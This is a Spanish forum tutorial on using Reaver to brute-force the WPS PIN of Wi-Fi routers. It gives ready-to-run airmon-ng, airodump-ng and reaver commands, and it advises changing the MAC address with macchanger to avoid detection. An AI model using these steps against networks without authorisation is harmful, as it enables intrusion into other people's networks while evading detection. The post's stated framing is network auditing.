Reaver – Uso y Solución de Problemas

by

Autor: Simanji

Buenos Dias!

Hoy por fín comencé a probar el sonado Reaver, incluido en Wifiway 3.4. Si bien aquí mismo en el foro encontré las instrucciones básicas de uso, no pude encontrar ningun post en el que se trataran mas aspectos del programa como solucion de problemas.

Contribuciones por
Warcry
zape000
gorilla.maguila

Primer paso: Para evitar perder el tiempo es indispensable determinar si la red a auditar tiene activado WPS.

*******************

Antiguamente se podía hacer con Walsh pero este ya no es el caso. De todas formas indicamos las instrucciones por si alguien les puede sacar provecho

1) Desde la consola poner la tarjeta de red en modo monitor
#airmon-ng start wlan0

2) Ejecutar walsh
# walsh -i mon0 -C

*******************

En vista de que Walsh ya no funciona el forista gorilla.maguila propuso el siguiente metodo efectivo

1) Desde la consola poner la tarjeta de red en modo monitor
# airmon-ng start wlan0

2) Abrimos el wireshark.

-> Menu Capture
->Options

Elegimos interfaz mon0 (o la que nos haya dado el airmon).

3) Nos aseguramos que no esté seleccionada ninguna opción, como se vé en la imagen

4) Le damos a Start para comenzar la captura de paquetes.

5) Para ver si tiene el WPS activado miramos en los paquetes broadcast la información que se encuentra en:

->IEEE 802.11 wireless LAN management frame
->Tagged parameters:
-> Tag: Vendor Specific: Microsoft WPS

Ejemplo:

*******************

Si la red tiene WPS se puede proceder a utilizar Reaver

1) Dado que los ataques WPS son detectables, indispensable cambiar la MAC
# macchanger -m 00:11:22:33:44:55 mon0

2) Buscar el AP deseado y anotar su BSSID correspondiente
# airodump-ng mon0

3) Se ejecuta Reaver de esta manera
# reaver -i mon0 -b 00:11:22:33:44:56

Para ver detalles sobre el proceso añadir el switch -vv
# reaver -i mon0 -b 00:11:22:33:44:56 -vv

Para cambiar el intervalo entre pins se usa el switch -d segundos. 0 Corresponde a desactivado.
# reaver -i mon0 -b 00:11:22:33:44:56 -vv -d 1

*******************

Cabe anotar que aunque el Router tenga el boton fisico de WPS instalado, el modo no necesariamente esta habilitado internamente. Segun el manual Reaver no funciona con todos los Routers, y algunos pueden simplemente bloquearse ante el ataque.

Las instrucciones e información se irán expandiendo a futuro